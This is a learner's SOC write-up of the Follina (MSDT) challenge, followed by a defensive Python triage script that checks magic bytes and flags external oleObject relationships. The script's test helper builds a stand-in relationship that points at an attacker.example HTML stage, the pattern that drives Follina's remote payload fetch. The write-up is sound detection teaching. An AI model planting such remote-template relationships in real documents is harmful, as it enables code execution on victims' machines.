Blue Team Labs Online - Follina
This is my SOC report on the Follina challenge.
Overview
The challenge
On a Friday evening, the SOC team received an alert regarding a newly disclosed and actively exploited Remote Code Execution (RCE) vulnerability, known as Follina, leveraging the Microsoft Diagnostic Tool (MSDT).
A suspicious file named sample.doc was identified. Static analysis revealed that the file was not a genuine Word document, but rather a ZIP-based Office Open XML container, crafted to bypass macro security controls and trigger payload execution via MSDT and Dynamic Data Exchange (DDE) mechanisms.
The sample was flagged as malicious by 46 antivirus vendors, confirming active exploitation in the wild.
My process
My Analysis
I used ExifTool to detect that the provided file was spoofed (a .doc extension masquerading over a different format). I hashed the file and performed OSINT on the hash using VirusTotal, which showed that 46 vendors flagged it as malicious.
During my analysis I found that the XML structure invokes external HTML content, which subsequently executes payloads via MSDT, bypassing macro-based security checks. The VirusTotal analysis report maps the malware's behavior to the following MITRE ATT&CK tactics:
- Execution
- Persistence
- Privilege Escalation
- Defense Evasion
- Discovery
- Command and Control
What I learned
I have learned not to trust a file extension until it is verified by confirming the file signature or by viewing the file metadata with ExifTool.
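The two checks described above (signature instead of extension, then a look for relationships that pull in external content) as an added triage script that is not part of the original report. The OLE and ZIP magic bytes and the OOXML relationship namespace are real; the sample built by `build_sample()` and its URL are constructed stand-ins, not indicators from the challenge.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy binary .doc (OLE compound file)
ZIP_MAGIC = b"PK\x03\x04"                        # OOXML (.docx) is a ZIP container
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

def container_type(data: bytes) -> str:
    """Classify by magic bytes; the file extension is never consulted."""
    if data.startswith(OLE_MAGIC):
        return "ole"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"

def external_relationships(data: bytes) -> list:
    """(part, type, target) for every relationship with TargetMode="External".
    A genuine document keeps its parts inside the ZIP; an oleObject pointing
    at a remote HTML URL is the Follina tell-tale."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith(".rels"):
                root = ET.fromstring(zf.read(name))
                for rel in root.iter(REL_NS + "Relationship"):
                    if rel.get("TargetMode", "").lower() == "external":
                        rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                        hits.append((name, rtype, rel.get("Target", "")))
    return hits

def triage(filename: str, data: bytes) -> dict:
    """Combine both checks into one verdict for a submitted file."""
    kind = container_type(data)
    external = external_relationships(data) if kind == "zip" else []
    remote_ole = [e for e in external if e[1] == "oleObject"
                  and e[2].lower().startswith(("http://", "https://"))]
    return {"container": kind, "external": external, "suspicious": bool(remote_ole),
            "extension_mismatch": kind == "zip" and filename.lower().endswith(".doc")}

def build_sample() -> bytes:
    """Constructed stand-in for sample.doc (placeholder URL, not a real IoC)."""
    rels = (f'<Relationships xmlns="{REL_NS[1:-1]}"><Relationship Id="rId1" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/'
            'relationships/oleObject" Target="http://attacker.example/stage.html" '
            'TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()
```

Run `triage("sample.doc", open("sample.doc", "rb").read())` on a real submission; a `.doc` that classifies as `zip` with a remote `oleObject` target is the pattern this challenge describes.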
Continued development
I will continue to take on more challenges and practice until I become a professional.
Tools & Resources
Acknowledgments
I wanted to sincerely thank you for volunteering your time to share your SOC analysis expertise with the public. Your training was exceptionally educative and provided practical skills that are immediately applicable.
I truly appreciate your generosity in providing such high-quality mentorship for free. This has added to my professional growth.
Full Report
For the full challenge report, you can read or download the full report from my-soc-report on my GitHub account.